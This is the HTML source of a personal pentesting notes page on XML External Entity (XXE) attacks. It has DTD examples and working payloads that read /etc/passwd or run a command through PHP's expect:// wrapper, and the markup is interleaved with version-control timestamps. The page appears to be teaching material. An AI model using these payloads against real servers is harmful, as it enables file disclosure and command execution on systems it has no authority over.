2022-09-02 09:05:59 +02:00
<!doctype html>
< html lang = "en" >
< center >
< head >
< script src = "https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js" > < / script >
2022-09-09 15:41:05 +02:00
< script src = "https://code.jquery.com/jquery-3.5.1.min.js" > < / script >
< script type = "text/javascript" src = "/static/js/auto-complete.js" > < / script >
< script type = "text/javascript" src = "/static/js/lunr.min.js" > < / script >
< script type = "text/javascript" src = "/static/js/search.js" > < / script >
2022-09-02 09:05:59 +02:00
< link rel = "stylesheet" href = "/static/stylesheet.css" >
< link rel = "stylesheet" href = "/static/auto-complete.css" >
< br >
2022-09-09 15:41:05 +02:00
< title > The Real Hugo< / title >
2022-09-02 09:05:59 +02:00
< meta name = "viewport" content = "width=device-width, initial-scale=1" >
< / head >
< body >
<!-- topmenu -->
< div class = "menu" >
2022-09-09 15:41:05 +02:00
< a href = "/" style = "text-decoration:none" > Husk< / a >
2022-09-02 09:05:59 +02:00
< / div >
< div class = "search-container" >
< label for = "search-by" > < i class = "fas fa-search" > < / i > < / label >
< input data-search-input = "" id = "search-by" type = "search" placeholder = "Search..." autocomplete = "off" >
<!-- button type="submit"><i class="search"></i>🔍</button> -->
< span data-search-clear = "" > < i class = "fas fa-times" > < / i > < / span >
< / div >
< / div >
< div class = "menu" >
< / div >
<!-- br><br -->
< / center >
< p > < / p >
< div class = "columns" >
<!-- Sidebar -->
< div class = "column column-1" >
2022-09-09 15:41:05 +02:00
< ul > < details id = enumeration ontoggle = "linkClick(this); return false;" > < summary > Enumeration< / summary > < ul > < details id = containers ontoggle = "linkClick(this); return false;" > < summary > Containers< / summary > < ul > < / ul > < / details > < details id = docs ontoggle = "linkClick(this); return false;" > < summary > Docs< / summary > < ul > < li > < a href = "/enumeration/docs/aws.html" > aws< / a > < / li > < li > < a href = "/enumeration/docs/cewl.html" > cewl< / a > < / li > < li > < a href = "/enumeration/docs/dns.html" > dns< / a > < / li > < li > < a href = "/enumeration/docs/docker_enumeration.html" > docker_enumeration< / a > < / li > < li > < a href = "/enumeration/docs/ffuf.html" > ffuf< / a > < / li > < li > < a href = "/enumeration/docs/gobuster.html" > gobuster< / a > < / li > < li > < a href = "/enumeration/docs/kerberoast.html" > kerberoast< / a > < / li > < li > < a href = "/enumeration/docs/kubectl.html" > kubectl< / a > < / li > < li > < a href = "/enumeration/docs/ldap.html" > ldap< / a > < / li > < li > < a href = "/enumeration/docs/linux_basics.html" > linux_basics< / a > < / li > < li > < a href = "/enumeration/docs/microk8s.html" > microk8s< / a > < / li > < li > < a href = "/enumeration/docs/nfs.html" > nfs< / a > < / li > < li > < a href = "/enumeration/docs/nikto.html" > nikto< / a > < / li > < li > < a href = "/enumeration/docs/nmap.html" > nmap< / a > < / li > < li > < a href = "/enumeration/docs/port_knocking.html" > port_knocking< / a > < / li > < li > < a href = "/enumeration/docs/rpcclient.html" > rpcclient< / a > < / li > < li > < a href = "/enumeration/docs/rsync.html" > rsync< / a > < / li > < li > < a href = "/enumeration/docs/rustscan.html" > rustscan< / a > < / li > < li > < a href = "/enumeration/docs/shodan.html" > shodan< / a > < / li > < details id = snmp ontoggle = "linkClick(this); return false;" > < summary > Snmp< / summary > < ul > < li > < a href = "/enumeration/docs/snmp/onesixtyone.html" > onesixtyone< / a > < / li > < li > < a href = "/enumeration/docs/snmp/snmpcheck.html" > snmpcheck< / a > < / li > < / ul > < / details > < li > < a href = "/enumeration/docs/websites.html" > websites< / a > < / li > < li > < a href = "/enumeration/docs/wfuzz.html" > wfuzz< / a > < / li > < li > < a href = "/enumeration/docs/wpscan.html" > wpscan< / a > < / li > < / ul > < / details > < details id = network_scanners ontoggle = "linkClick(this); return false;" > < summary > Network_scanners< / summary > < ul > < / ul > < / details > < details id = windows ontoggle = "linkClick(this); return false;" > < summary > Windows< / summary > < ul > < li > < a href = "/enumeration/windows/bloodhound.html" > bloodhound< / a > < / li > < li > < a href = "/enumeration/windows/event_log.html" > event_log< / a > < / li > < li > < a href = "/enumeration/windows/manual_enum.html" > manual_enum< / a > < / li > < li > < a href = "/enumeration/windows/powershell.html" > powershell< / a > < / li > < li > < a href = "/enumeration/windows/rpcclient.html" > rpcclient< / a > < / li > < li > < a href = "/enumeration/windows/sysinternals.html" > sysinternals< / a > < / li > < li > < a href = "/enumeration/windows/sysmon.html" > sysmon< / a > < / li > < li > < a href = "/enumeration/windows/vss.html" > vss< / a > < / li > < / ul > < / details > < / ul > < / details > < details id = exploit ontoggle = "linkClick(this); return false;" > < summary > Exploit< / summary > < ul > < details id = CPUs ontoggle = "linkClick(this); return false;" > < summary > CPUs< / summary > < ul > < li > < a href = "/exploit/CPUs/meltdown.html" > meltdown< / a > < / li > < / ul > < / details > < details id = binaries ontoggle = "linkClick(this); return false;" > < summary > Binaries< / summary > < ul > < li > < a href = "/exploit/binaries/Shellcode.html" > Shellcode< / a > < / li > < li > < a href = "/exploit/binaries/aslr.html" > aslr< / a > < / li > < details id = buffer_overflow ontoggle = "linkClick(this); return false;" > < summary > Buffer_overflow< / summary > < ul > < details id = docs ontoggle = "linkClick(this); return false;" > < summary > Docs< / summary > < ul > < li > < a href = "/exploit/binaries/buffer_overflow/docs/amd64.html" > amd64< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/amd64_instructions.html" > amd64_instructions< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/buffer_overflow.html" > buffer_overflow< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html" > cut_stack_in_half< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html" > pwntools_specifics< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html" > ret_address_reuse< / a > < / li > < / ul > < / details > < li > < a href = "/exploit/binaries/buffer_overflow/ropping.html" > ropping< / a > < / li > < / ul > < / details > < details id = canary_bypass ontoggle = "l
2022-09-02 09:05:59 +02:00
< / ul >
< / div >
< div class = "column column-2" >
< span class = "body" >
< style > p r e { l i n e - h e i g h t : 1 2 5 % ; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */< / style >
< div class = "column column-3" >
< ul >
< li > < a href = "#xml-external-entity-xxe" > XML External Entity (XXE)< / a > < ul >
< li > < a href = "#document-type-definition-dtd" > Document Type Definition (DTD)< / a > < / li >
< li > < a href = "#replacing-xml-content" > Replacing XML content< / a > < / li >
< li > < a href = "#tools" > Tools< / a > < / li >
< / ul >
< / li >
< / ul >
< / div >
< h1 id = "xml-external-entity-xxe" > XML External Entity (XXE)< / h1 >
< p > An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.< / p >
< p > There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
1. An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.< / p >
< ol >
< li > out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.< / li >
< / ol >
< h2 id = "document-type-definition-dtd" > Document Type Definition (DTD)< / h2 >
< p > A DTD defines the structure and the legal elements and attributes of an XML document.< / p >
< ul >
< li > Example file content of < code > note.dtd< / code > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "cp" > < !DOCTYPE note [ < !ELEMENT note (to,from,heading,body)> < / span > < span class = "cp" > < !ELEMENT to (#PCDATA)> < / span > < span class = "cp" > < !ELEMENT from (#PCDATA)> < / span > < span class = "cp" > < !ELEMENT heading (#PCDATA)> < / span > < span class = "cp" > < !ELEMENT body (#PCDATA)> < / span > ]>
< / code > < / pre > < / div >
< ul >
< li > !DOCTYPE note - Defines a root element of the document named note< / li >
< li > !ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"< / li >
< li > !ELEMENT to - Defines the < code > to< / code > element to be of type "#PCDATA"< / li >
< li > !ELEMENT from - Defines the < code > from< / code > element to be of type "#PCDATA"< / li >
< li > !ELEMENT heading - Defines the < code > heading< / code > element to be of type "#PCDATA"< / li >
< li >
< p > !ELEMENT body - Defines the < code > body< / code > element to be of type "#PCDATA"< / p >
< p > NOTE: #PCDATA means parseable character data.< / p >
< / li >
< li >
< p > Resulting XML doc follows< / p >
< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "cp" > < ?xml version=" 1.0" encoding=" UTF-8" ?> < / span >
< span class = "cp" > < !DOCTYPE note SYSTEM " note.dtd" > < / span >
< span class = "nt" > < note> < / span >
< span class = "nt" > < to> < / span > falcon< span class = "nt" > < /to> < / span >
< span class = "nt" > < from> < / span > feast< span class = "nt" > < /from> < / span >
< span class = "nt" > < heading> < / span > hacking< span class = "nt" > < /heading> < / span >
< span class = "nt" > < body> < / span > XXE attack< span class = "nt" > < /body> < / span >
< span class = "nt" > < /note> < / span >
< / code > < / pre > < / div >
< h2 id = "replacing-xml-content" > Replacing XML content< / h2 >
< ul >
< li > Name in the example< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "cp" > < !DOCTYPE replace [< !ENTITY name " feast" > < / span > ]>
< span class = "nt" > < userInfo> < / span >
< span class = "nt" > < firstName> < / span > falcon< span class = "nt" > < /firstName> < / span >
< span class = "nt" > < lastName> < / span > < span class = "ni" > & name;< / span > < span class = "nt" > < /lastName> < / span >
< span class = "nt" > < /userInfo> < / span >
< / code > < / pre > < / div >
< ul >
< li > System call inside entity< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "cp" > < ?xml version=" 1.0" encoding=" UTF-8" ?> < / span >
< span class = "cp" > < !DOCTYPE foo [< !ENTITY xxe SYSTEM ' file:///etc/passwd' > < / span > ]>
< span class = "nt" > < root> < / span >
< span class = "nt" > < name> < / span > sdafsa< span class = "nt" > < /name> < / span >
< span class = "nt" > < tel> < / span > 789731421< span class = "nt" > < /tel> < / span >
< span class = "nt" > < email> < / span > < span class = "ni" > & xxe;< / span > < span class = "nt" > < /email> < / span >
< span class = "nt" > < password> < / span > 12345< span class = "nt" > < /password> < / span >
< span class = "nt" > < /root> < / span >
< / code > < / pre > < / div >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "cp" > < ?xml version=" 1.0" ?> < / span >
< span class = "cp" > < !DOCTYPE root [< !ENTITY read SYSTEM ' file:///etc/passwd' > < / span > ]>
< span class = "nt" > < root> < / span > < span class = "ni" > & read;< / span > < span class = "nt" > < /root> < / span >
< / code > < / pre > < / div >
< ul >
< li > PHP expect using syscalls< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "cp" > < ?xml version=" 1.0" ?> < / span >
< span class = "cp" > < !DOCTYPE foo [ < !ELEMENT foo ANY > < / span >
< span class = "cp" > < !ENTITY xxe SYSTEM " expect://id" > < / span > ]>
< span class = "nt" > < root> < / span >
< span class = "nt" > < email> < / span > < span class = "ni" > & xxe;< / span > < span class = "nt" > < /email> < / span >
< span class = "nt" > < password> < / span > 12345< span class = "nt" > < /password> < / span >
< span class = "nt" > < /root> < / span >
< / code > < / pre > < / div >
< h2 id = "tools" > Tools< / h2 >
< ul >
< li > < a href = "https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe" > Payload All The Things< / a > < / li >
< / ul >
< / span >
< / div >
< / div >
< div id = "footer" >
< p > < / p >
< center >
© Stefan Friese
< / center >
< / div >
< script >
2022-09-09 15:41:05 +02:00
function linkClick(obj) {
2022-09-02 09:05:59 +02:00
if (obj.open) {
2022-09-09 15:41:05 +02:00
//console.log('open');
2022-09-02 09:05:59 +02:00
if (sessionStorage.getItem(obj.id) & & !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
2022-09-09 15:41:05 +02:00
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
2022-09-02 09:05:59 +02:00
} else {
2022-09-09 15:41:05 +02:00
//console.log('closed');
sessionStorage.removeItem(obj.id);
}
}
2022-09-02 09:05:59 +02:00
2022-09-09 15:41:05 +02:00
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length ; i + + ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
2022-09-02 09:05:59 +02:00
< / script >
2022-09-09 15:41:05 +02:00
< script async src = "https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type = "text/javascript" > < / script >
2022-09-02 09:05:59 +02:00
< script type = "text/x-mathjax-config" >
2022-09-09 15:41:05 +02:00
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
< / script >
2022-09-02 09:05:59 +02:00
< / body >
< / html >
